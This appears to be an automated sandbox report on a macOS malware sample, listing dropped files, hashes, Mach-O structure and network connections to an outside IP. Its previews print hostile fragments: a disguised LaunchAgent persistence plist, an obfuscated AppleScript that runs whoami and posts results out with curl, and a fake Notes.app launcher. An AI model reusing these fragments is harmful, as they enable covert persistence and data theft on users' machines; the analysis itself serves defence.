SHA-512:	152977FC6E8376516E08857C088248704174A2CA49127B5F3513B35DFCF39D4E31A20B8DFA98D98D60EC30BB78B0DFBFD32E7B76D13A5A154C210661881697AF
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>files</key>..<dict>...<key>Resources/Scripts/main.scpt</key>...<data>.../69umtrNm1AidJEM6HI93TzGnyo=...</data>...<key>Resources/applet.icns</key>...<data>...sINd6lbiqHD5dL8c6u79cFvVXhw=...</data>...<key>Resources/applet.rsrc</key>...<data>...ar5xmDs9mPpaINVXiVlVqUCB8ao=...</data>..</dict>..<key>files2</key>..<dict>...<key>Resources/Scripts/main.scpt</key>...<dict>....<key>hash</key>....<data>..../69umtrNm1AidJEM6HI93TzGnyo=....</data>....<key>hash2</key>....<data>....Sb/x7gjp605WBkt+P5EVMi8pyjgT+50g1+hUNsNDiew=....</data>...</dict>...<key>Resources/applet.icns</key>...<dict>....<key>hash</key>....<data>....sINd6lbiqHD5dL8c6u79cFvVXhw=....</data>....<key>hash2</key>....<data>....J7weZ6vlnv9r32tS5HFcyuPXl2StdDnfepLxAixlryk=....</data>...</dict>...<key>Resources/applet.rsrc</key>...<dict>....<key>hash</key>....<dat

/Users/pedro/Library/LaunchAgents/com.apple.spx.plist

Download File

Process:	/bin/cat
File Type:	XML document text
Category:	dropped
Size (bytes):	636
Entropy (8bit):	5.090777966119371
Encrypted:	false
SSDEEP:	12:TMHdgo+tJVEdQiCXYn9cJASPeEJ+AtLBw4LBD:2dfyiwPLJTRx
MD5:	AB5E4D9C02A176D68D7E404C7761E22F
SHA1:	F1E24EC639A0669B711FEE3849E9082042F776F1
SHA-256:	E60C9C8A34807E836B6D3D0C5C96160D89F41F8857A944C3CEF62E05FB9016D8
SHA-512:	824CEDBE419CF54B50D8E1FC0C4B057929F76DF64D988327CF31D48C81A254903EFE1964383BCB0A4D21B62859B38CC95651689939E5386D3C02FD7B92BFEEF9
Malicious:	true
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">..<dict>...<key>Label</key>...<string>demo</string>...<key>Program</key>...<string>/bin/bash</string>...<key>ProgramArguments</key>...<array>....<string>bash</string>....<string>/Users/pedro/Library/Caches/GitServices/AppleWebKit</string>...</array>...<key>RunAtLoad</key>...<true/>...<key>StandardErrorPath</key>...<string>/dev/null</string>...<key>StandardOutPath</key>...<string>/dev/null</string>...<key>StartInterval</key>...<integer>21600</integer>..</dict>.</plist>.

/dev/null

Download File

Process:	/usr/bin/osascript
File Type:	ASCII text
Category:	dropped
Size (bytes):	66
Entropy (8bit):	4.811302028672787
Encrypted:	false
SSDEEP:	3:tXLuYEvwDOBVfUTQ3eVRWOv:VuYhOX8uKkA
MD5:	FF75A2AAA63ACE77D30399C9F1E58A0F
SHA1:	CD4781A9ACDE06D3A91E9FD943DD11C54DEDFD36
SHA-256:	0FB972AF2766CAC17E16F2D5637C4EA29280896D53EC9223DF4B3F1D7E1F2011
SHA-512:	371707C59E539957857A18AA1BC4C73FD16C85F5D42E6E4F47F5A59A57B16326ECBAB7C5D5C2BA9C99E21EF4601FDDCD6A50133DBDE41D1ED86394070055C379
Malicious:	false
Reputation:	low
Preview:	2022-08-24 13:18:43.319 osascript[1037:16578] ApplePersistence=NO.

/private/var/tmp/sh-thd-1661359170

Download File

Process:	/bin/bash
File Type:	ASCII text
Category:	dropped
Size (bytes):	152
Entropy (8bit):	4.542576005868008
Encrypted:	false
SSDEEP:	3:ivOsBeblWV9T4K8GKV5JKjKHAXNTGVf/RzL8Vo0WhWLXfOI:ivDBebMVB4K8GwxlfZnEo0djf
MD5:	D912FFF3B04ADE86E17A0C8AA381A68F
SHA1:	144F5DCC9299FF3179E393C9EFFD14BA954338BC
SHA-256:	E4AC5C8EA060A2AD31CC81496AB2074C570AE55DA8AA9DBB141A72B021549667
SHA-512:	E4D18F9931C67F59D98BEF23486FC4D5A470D752FD3415B2765B910764853B6D6D64661F4C24F6F116DC6AFB546D016E5B2C9E63A25C913AC13D6E5EC4DA6EAB
Malicious:	false
Reputation:	low
Preview:	.try....do shell script "osascript '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/a.scpt'"...end try..

/private/var/tmp/sh-thd-2768930856

Download File

Process:	/bin/bash
File Type:	UTF-8 Unicode text
Category:	dropped
Size (bytes):	1700
Entropy (8bit):	5.1018108642470485
Encrypted:	false
SSDEEP:	24:6QBQS3f3lFFGep5lBTNbahb5P+Fc8uVknVZhsfAR8F4A6P5c9:6QBFh5lZNbCb5qc/qnXhsfbF0P5I
MD5:	82601DA2F69729B7E2B8CA15189F55A6
SHA1:	AB7A8E358324FDC003DA149614FB41678BBDAD1B
SHA-256:	0731ADF16FB49825EEBA981344C7B0E0D12E6F1102C90A7538F2CF0865EDB0E2
SHA-512:	CE0087CE13D1FF1D431C787CDB40B4D6A3DCBE92D3FA7C644DAA693E91F9508C8F664A25361A9EB910E3A94C8350832544523EF4A9CFCF14AC3B9BCF625623E0
Malicious:	false
Reputation:	low
Preview:	global ds.global d.global di..set ds to {"........................", "......................", "......................", "........................", "........................", "........................"}..set di to 1.set d to item di of ds..on xe(_str)..set x to id of _str..repeat with c in x...set contents of c to c - (102 - 2)..end repeat..return string id x.end xe..on xex(_str)..set x to id of _str..repeat with c in x...set contents of c to c - (102 - 1)..end repeat..return string id x.end xex..on m()....-- log "domain used " & xe(d)....set dF to POSIX path of ((path to me as text) & "::")....set tF to quoted form of (dF & xex("....................")) -- /Containers....do shell script "rm -rf " & tF..set a to "123"..do shell script "mkdir -p " & tF....set f to quoted form of (dF & xex("........................")) -- /Containers/a....set un to do shell script xe("............") -- whoami....do shell script "curl -sk -d '" & xe("........") & "=" & un & "&" & xex("....................

/private/var/tmp/sh-thd-4984095783

Download File

Process:	/bin/bash
File Type:	ASCII text
Category:	dropped
Size (bytes):	93
Entropy (8bit):	4.448904576734105
Encrypted:	false
SSDEEP:	3:JwWyWKV5JKjKHAXNTGVf/RzL8Vo0WbpVVOkv:pyWwxlfZnEo0e7nv
MD5:	850BC02D33AAAE950C6A77BE998068A6
SHA1:	3F98DC818171F562D23EBC9107C774D90C2170FA
SHA-256:	B9CA4CD6EE465E8ED3C7CEC6F45BC231D413F68F8DFF60360F6465E917004F29
SHA-512:	C7A9D731D819F5488E863B46C8BA23A701E3538F5B8EBEC2C5B296C33DB57DC7F73EE46F23A71DAE2F365A560CCE33211D11F3A1D3F15CD8E4283051F6430778
Malicious:	false
Reputation:	low
Preview:	'/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/MacOS/applet'.

/private/var/tmp/sh-thd-4984109211

Download File

Process:	/bin/bash
File Type:	XML document text
Category:	dropped
Size (bytes):	636
Entropy (8bit):	5.090777966119371
Encrypted:	false
SSDEEP:	12:TMHdgo+tJVEdQiCXYn9cJASPeEJ+AtLBw4LBD:2dfyiwPLJTRx
MD5:	AB5E4D9C02A176D68D7E404C7761E22F
SHA1:	F1E24EC639A0669B711FEE3849E9082042F776F1
SHA-256:	E60C9C8A34807E836B6D3D0C5C96160D89F41F8857A944C3CEF62E05FB9016D8
SHA-512:	824CEDBE419CF54B50D8E1FC0C4B057929F76DF64D988327CF31D48C81A254903EFE1964383BCB0A4D21B62859B38CC95651689939E5386D3C02FD7B92BFEEF9
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">..<dict>...<key>Label</key>...<string>demo</string>...<key>Program</key>...<string>/bin/bash</string>...<key>ProgramArguments</key>...<array>....<string>bash</string>....<string>/Users/pedro/Library/Caches/GitServices/AppleWebKit</string>...</array>...<key>RunAtLoad</key>...<true/>...<key>StandardErrorPath</key>...<string>/dev/null</string>...<key>StandardOutPath</key>...<string>/dev/null</string>...<key>StartInterval</key>...<integer>21600</integer>..</dict>.</plist>.

Static File Info

General

File type:	Mach-O 64-bit executable
Entropy (8bit):	0.24113538786665298
TrID:	Mac OS X Mach-O 64bit Intel executable (20004/1) 100.00%
File name:	exec.2430808
File size:	1061683
MD5:	1ce8099c5bb8fbe715ae7c546c46a526
SHA1:	127b66afa20a1c42e653ee4f4b64cf1ee3ed637d
SHA256:	483b2f45a06516439b1dbfedda52f135a4ccdeafd91192e64250305644e5ff48
SHA512:	935314486737963e2a9322d42543ae974bc021b469471335cda9b1bc479714891d3b73a6c0426483bf7bd5acc3a7adceb3bc2e7b734b8b0084f4c94befdcd0ac
SSDEEP:	384:TiQoZUBicbTt2mj8R887rg6ZHoKyWtptTerJscJ4zj6+amd0+:TijakUTF4O4ZIMDQXins
TLSH:	6B358E262B09EA66D16DC474ACEF8B875917F9300D6993138ED0CE782FDD798191074F
File Content Preview:	.......................... .........H...__PAGEZERO..............................................................__TEXT...................@...............@......................__text..........__TEXT..........P1..............P1.............................

Static Mach Info

General Information for header 1
Endian:	<
Size:	64-bit
Architecture:	x86_64
Filetype:	execute
Nbr. of load commands:	16
Entry point:	0x3CF0

segment_command_64 aggregated: 5

Name	Value
segname	__PAGEZERO
vmaddr	0x0
vmsize	0x100000000
fileoff	0x0
filesize	0x0
maxprot	0x0
initprot	0x0
nsects	0
flags	0x0

Name

Value

segname

__TEXT

vmaddr

0x100000000

vmsize

0x4000

fileoff

0x0

filesize

0x4000

maxprot

0x5

initprot

0x5

nsects

flags

0x0

Datas

sectname	segname	addr	size	offset	entropy	align	reloff	nreloc	flags
__text	__TEXT	0x100003150	0xC9E	0x3150	5.4991	0x4	0x0	0	0x80000400
__stubs	__TEXT	0x100003DEE	0x84	0x3DEE	2.9949	0x1	0x0	0	0x80000408
__stub_helper	__TEXT	0x100003E74	0xEC	0x3E74	3.5391	0x2	0x0	0	0x80000400
__cstring	__TEXT	0x100003F60	0x50	0x3F60	4.4999	0x0	0x0	0	0x2
__unwind_info	__TEXT	0x100003FB0	0x48	0x3FB0	1.6106	0x2	0x0	0	0x0

Name

Value

segname

__DATA_CONST

vmaddr

0x100004000

vmsize

0x4000

fileoff

0x4000

filesize

0x4000

maxprot

0x3

initprot

0x3

nsects

flags

0x10

Datas

sectname	segname	addr	size	offset	entropy	align	reloff	nreloc	flags
__got	__DATA_CONST	0x100004000	0x20	0x4000	-0.0000	0x3	0x0	0	0x6

Name

Value

segname

__DATA

vmaddr

0x100008000

vmsize

0x4000

fileoff

0x8000

filesize

0x4000

maxprot

0x3

initprot

0x3

nsects

flags

0x0

Datas

sectname	segname	addr	size	offset	entropy	align	reloff	nreloc	flags
__la_symbol_ptr	__DATA	0x100008000	0xB0	0x8000	2.2282	0x3	0x0	0	0x7
__data	__DATA	0x1000080B0	0x314E	0x80B0	7.9861	0x4	0x0	0	0x0
__bss	__DATA	0x10000B200	0x110	0x0	-0.0000	0x4	0x0	0	0x1

Name	Value
segname	__LINKEDIT
vmaddr	0x10000C000
vmsize	0x610
fileoff	0xC000
filesize	0x610
maxprot	0x1
initprot	0x1
nsects	0
flags	0x0

dyld_info_command aggregated: 1

Name	Value
rebase_off	49152
rebase_size	8
bind_off	49160
bind_size	72
weak_bind_off	0
weak_bind_size	0
lazy_bind_off	49232
lazy_bind_size	352
export_off	49584
export_size	144

symtab_command aggregated: 1

Name	Value
symoff	49752
nsyms	28
stroff	50392
strsize	312

dysymtab_command aggregated: 1

Name	Value
ilocalsym	0
nlocalsym	1
iextdefsym	1
nextdefsym	1
iundefsym	2
nundefsym	26
tocoff	0
ntoc	0
modtaboff	0
nmodtab	0
extrefsymoff	0
nextrefsyms	0
indirectsymoff	50200
nindirectsyms	48
extreloff	0
nextrel	0
locreloff	0
nlocrel	0

dylinker_command aggregated: 1

Name

Value

name

Datas

/usr/lib/dyld

uuid_command aggregated: 1

Name	Value
uuid	b'~4&R6\xa90\xd7\xa2\x04m\x95-P:B'

build_version_command aggregated: 1

Name

Value

platform

minos

720896

sdk

786688

ntools

Datas

source_version_command aggregated: 1

Name	Value
version	0

entry_point_command aggregated: 1

Name	Value
entryoff	15600
stacksize	0

dylib_command aggregated: 1

Name

Value

name

timestamp

Thu Jan 1 01:00:02 1970

current_version

1311.0.0

compatibility_version

1.0.0

Datas

/usr/lib/libSystem.B.dylib

linkedit_data_command aggregated: 2

Name	Value
dataoff	49728
datasize	24

Name	Value
dataoff	49752
datasize	0

Internal Symbols

___error

___memcpy_chk

___memset_chk

___sprintf_chk

___stack_chk_fail

___stack_chk_guard

___stderrp

__mh_execute_header

_atoll

_calloc

_environ

_execvp

_exit

_fprintf

_getenv

_getpid

_malloc

_memcmp

_memset

_putenv

_sscanf

_stat$INODE64

_strdup

_strerror

_strlen

_time

dyld_stub_binder

radr://5614542

External Symbols

___error

___memcpy_chk

___memset_chk

___sprintf_chk

___stack_chk_fail

_atoll

_calloc

_execvp

_exit

_fprintf

_getenv

_getpid

_malloc

_memcmp

_memset

_putenv

_sscanf

_stat$INODE64

_strdup

_strerror

_strlen

_time

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 24, 2022 11:18:40.727193117 CEST	49301	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:40.727243900 CEST	443	49301	45.82.153.92	192.168.0.53
Aug 24, 2022 11:18:40.727504015 CEST	49301	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:40.742438078 CEST	49301	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:40.742476940 CEST	443	49301	45.82.153.92	192.168.0.53
Aug 24, 2022 11:18:40.914618969 CEST	443	49301	45.82.153.92	192.168.0.53
Aug 24, 2022 11:18:40.915115118 CEST	49301	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:40.915431023 CEST	49301	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:40.915436029 CEST	443	49301	45.82.153.92	192.168.0.53
Aug 24, 2022 11:18:40.917587996 CEST	49301	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:40.917618036 CEST	443	49301	45.82.153.92	192.168.0.53
Aug 24, 2022 11:18:40.919506073 CEST	443	49301	45.82.153.92	192.168.0.53
Aug 24, 2022 11:18:40.920073032 CEST	49301	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:40.920082092 CEST	49301	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:40.920084953 CEST	49301	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:40.985593081 CEST	49301	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:40.985635996 CEST	49301	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:40.985773087 CEST	49301	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:40.985865116 CEST	443	49301	45.82.153.92	192.168.0.53
Aug 24, 2022 11:18:40.986031055 CEST	49301	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:40.986051083 CEST	443	49301	45.82.153.92	192.168.0.53
Aug 24, 2022 11:18:40.986289978 CEST	49301	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:41.041349888 CEST	443	49301	45.82.153.92	192.168.0.53
Aug 24, 2022 11:18:41.041440964 CEST	443	49301	45.82.153.92	192.168.0.53
Aug 24, 2022 11:18:41.041840076 CEST	49301	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:41.041857958 CEST	49301	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:41.042155027 CEST	49301	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:41.042171001 CEST	443	49301	45.82.153.92	192.168.0.53
Aug 24, 2022 11:18:41.063364983 CEST	49302	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:41.063415051 CEST	443	49302	45.82.153.92	192.168.0.53
Aug 24, 2022 11:18:41.063541889 CEST	49302	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:41.068994045 CEST	49302	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:41.069031954 CEST	443	49302	45.82.153.92	192.168.0.53
Aug 24, 2022 11:18:41.175654888 CEST	443	49302	45.82.153.92	192.168.0.53
Aug 24, 2022 11:18:41.176105976 CEST	49302	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:41.176367998 CEST	49302	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:41.176378012 CEST	443	49302	45.82.153.92	192.168.0.53
Aug 24, 2022 11:18:41.177393913 CEST	49302	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:41.177423954 CEST	443	49302	45.82.153.92	192.168.0.53
Aug 24, 2022 11:18:41.180175066 CEST	443	49302	45.82.153.92	192.168.0.53
Aug 24, 2022 11:18:41.180788040 CEST	49302	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:41.180805922 CEST	49302	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:41.180811882 CEST	49302	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:41.186127901 CEST	49302	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:41.186177969 CEST	49302	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:41.186194897 CEST	49302	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:41.186395884 CEST	443	49302	45.82.153.92	192.168.0.53
Aug 24, 2022 11:18:41.186754942 CEST	49302	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:41.186778069 CEST	443	49302	45.82.153.92	192.168.0.53
Aug 24, 2022 11:18:41.187012911 CEST	49302	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:41.323039055 CEST	443	49302	45.82.153.92	192.168.0.53
Aug 24, 2022 11:18:41.323127031 CEST	443	49302	45.82.153.92	192.168.0.53
Aug 24, 2022 11:18:41.323525906 CEST	49302	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:41.323544979 CEST	49302	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:41.323786974 CEST	49302	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:41.323802948 CEST	443	49302	45.82.153.92	192.168.0.53
Aug 24, 2022 11:18:43.495767117 CEST	49303	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:43.495821953 CEST	443	49303	45.82.153.92	192.168.0.53
Aug 24, 2022 11:18:43.495974064 CEST	49303	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:43.520663023 CEST	49303	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:43.520685911 CEST	443	49303	45.82.153.92	192.168.0.53
Aug 24, 2022 11:18:43.692485094 CEST	443	49303	45.82.153.92	192.168.0.53
Aug 24, 2022 11:18:43.692616940 CEST	49303	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:43.692744017 CEST	49303	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:43.692754984 CEST	443	49303	45.82.153.92	192.168.0.53
Aug 24, 2022 11:18:43.693382978 CEST	49303	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:43.693388939 CEST	443	49303	45.82.153.92	192.168.0.53
Aug 24, 2022 11:18:43.694917917 CEST	443	49303	45.82.153.92	192.168.0.53
Aug 24, 2022 11:18:43.695168972 CEST	49303	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:43.695297956 CEST	49303	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:43.695302010 CEST	49303	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:43.699300051 CEST	49303	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:43.699395895 CEST	49303	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:43.699400902 CEST	49303	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:43.699465990 CEST	443	49303	45.82.153.92	192.168.0.53
Aug 24, 2022 11:18:43.699616909 CEST	49303	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:43.699623108 CEST	443	49303	45.82.153.92	192.168.0.53
Aug 24, 2022 11:18:43.699748039 CEST	49303	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:43.885251045 CEST	443	49303	45.82.153.92	192.168.0.53
Aug 24, 2022 11:18:43.885293007 CEST	443	49303	45.82.153.92	192.168.0.53
Aug 24, 2022 11:18:43.885395050 CEST	49303	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:43.885412931 CEST	443	49303	45.82.153.92	192.168.0.53
Aug 24, 2022 11:18:43.885456085 CEST	443	49303	45.82.153.92	192.168.0.53
Aug 24, 2022 11:18:43.885524035 CEST	49303	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:43.885534048 CEST	49303	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:43.885538101 CEST	49303	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:43.885541916 CEST	49303	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:43.885545015 CEST	49303	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:43.885667086 CEST	49303	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:43.885782957 CEST	49303	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:43.885788918 CEST	49303	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:43.885792971 CEST	49303	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:43.885796070 CEST	49303	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:43.885802031 CEST	49303	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:43.885891914 CEST	49303	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:43.885900021 CEST	49303	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:43.885914087 CEST	443	49303	45.82.153.92	192.168.0.53
Aug 24, 2022 11:18:44.185503006 CEST	49304	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:44.185564995 CEST	443	49304	45.82.153.92	192.168.0.53
Aug 24, 2022 11:18:44.185693026 CEST	49304	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:44.192274094 CEST	49304	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:44.192313910 CEST	443	49304	45.82.153.92	192.168.0.53
Aug 24, 2022 11:18:44.299062014 CEST	443	49304	45.82.153.92	192.168.0.53
Aug 24, 2022 11:18:44.299223900 CEST	49304	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:44.299307108 CEST	49304	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:44.299318075 CEST	443	49304	45.82.153.92	192.168.0.53
Aug 24, 2022 11:18:44.300009966 CEST	49304	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:44.300040007 CEST	443	49304	45.82.153.92	192.168.0.53
Aug 24, 2022 11:18:44.302877903 CEST	443	49304	45.82.153.92	192.168.0.53
Aug 24, 2022 11:18:44.303113937 CEST	49304	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:44.303240061 CEST	49304	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:44.303247929 CEST	49304	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:44.307301998 CEST	49304	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:44.307343960 CEST	49304	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:44.307362080 CEST	49304	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:44.307569981 CEST	443	49304	45.82.153.92	192.168.0.53
Aug 24, 2022 11:18:44.307703018 CEST	49304	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:44.307723999 CEST	443	49304	45.82.153.92	192.168.0.53
Aug 24, 2022 11:18:44.307893038 CEST	49304	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:44.445924044 CEST	443	49304	45.82.153.92	192.168.0.53
Aug 24, 2022 11:18:44.446023941 CEST	443	49304	45.82.153.92	192.168.0.53
Aug 24, 2022 11:18:44.446084023 CEST	49304	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:44.446177959 CEST	49304	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:44.446310043 CEST	49304	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:44.446330070 CEST	443	49304	45.82.153.92	192.168.0.53
Aug 24, 2022 11:18:56.835057974 CEST	49305	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:56.835114002 CEST	443	49305	45.82.153.92	192.168.0.53
Aug 24, 2022 11:18:56.835242033 CEST	49305	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:56.841806889 CEST	49305	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:56.841846943 CEST	443	49305	45.82.153.92	192.168.0.53
Aug 24, 2022 11:18:56.951252937 CEST	443	49305	45.82.153.92	192.168.0.53
Aug 24, 2022 11:18:56.951390982 CEST	49305	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:56.951514959 CEST	49305	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:56.951527119 CEST	443	49305	45.82.153.92	192.168.0.53
Aug 24, 2022 11:18:56.952187061 CEST	49305	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:56.952217102 CEST	443	49305	45.82.153.92	192.168.0.53
Aug 24, 2022 11:18:56.955049038 CEST	443	49305	45.82.153.92	192.168.0.53
Aug 24, 2022 11:18:56.955312967 CEST	49305	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:56.955440044 CEST	49305	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:56.955447912 CEST	49305	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:56.959562063 CEST	49305	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:56.959604979 CEST	49305	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:56.959748983 CEST	49305	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:56.959831953 CEST	443	49305	45.82.153.92	192.168.0.53
Aug 24, 2022 11:18:56.959984064 CEST	49305	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:56.960005045 CEST	443	49305	45.82.153.92	192.168.0.53
Aug 24, 2022 11:18:56.960268021 CEST	49305	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:57.406070948 CEST	443	49305	45.82.153.92	192.168.0.53
Aug 24, 2022 11:18:57.406167030 CEST	443	49305	45.82.153.92	192.168.0.53
Aug 24, 2022 11:18:57.406234026 CEST	49305	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:57.406426907 CEST	49305	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:57.406512976 CEST	49305	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:57.406531096 CEST	443	49305	45.82.153.92	192.168.0.53
Aug 24, 2022 11:18:59.779963017 CEST	49306	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:59.780016899 CEST	443	49306	45.82.153.92	192.168.0.53
Aug 24, 2022 11:18:59.780143976 CEST	49306	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:59.786600113 CEST	49306	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:59.786638975 CEST	443	49306	45.82.153.92	192.168.0.53
Aug 24, 2022 11:18:59.894421101 CEST	443	49306	45.82.153.92	192.168.0.53
Aug 24, 2022 11:18:59.894620895 CEST	49306	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:59.894707918 CEST	49306	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:59.894716978 CEST	443	49306	45.82.153.92	192.168.0.53
Aug 24, 2022 11:18:59.895380020 CEST	49306	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:59.895410061 CEST	443	49306	45.82.153.92	192.168.0.53
Aug 24, 2022 11:18:59.898206949 CEST	443	49306	45.82.153.92	192.168.0.53
Aug 24, 2022 11:18:59.898442030 CEST	49306	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:59.898567915 CEST	49306	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:59.898576975 CEST	49306	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:59.902034044 CEST	49306	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:59.902084112 CEST	49306	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:59.902101994 CEST	49306	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:59.902298927 CEST	443	49306	45.82.153.92	192.168.0.53
Aug 24, 2022 11:18:59.902431011 CEST	49306	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:18:59.902451992 CEST	443	49306	45.82.153.92	192.168.0.53
Aug 24, 2022 11:18:59.902607918 CEST	49306	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:00.042859077 CEST	443	49306	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:00.042954922 CEST	443	49306	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:00.043049097 CEST	49306	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:00.043138027 CEST	49306	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:00.043267965 CEST	49306	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:00.043283939 CEST	443	49306	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:00.183387041 CEST	49307	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:00.183439016 CEST	443	49307	45.82.153.92	192.168.0.53
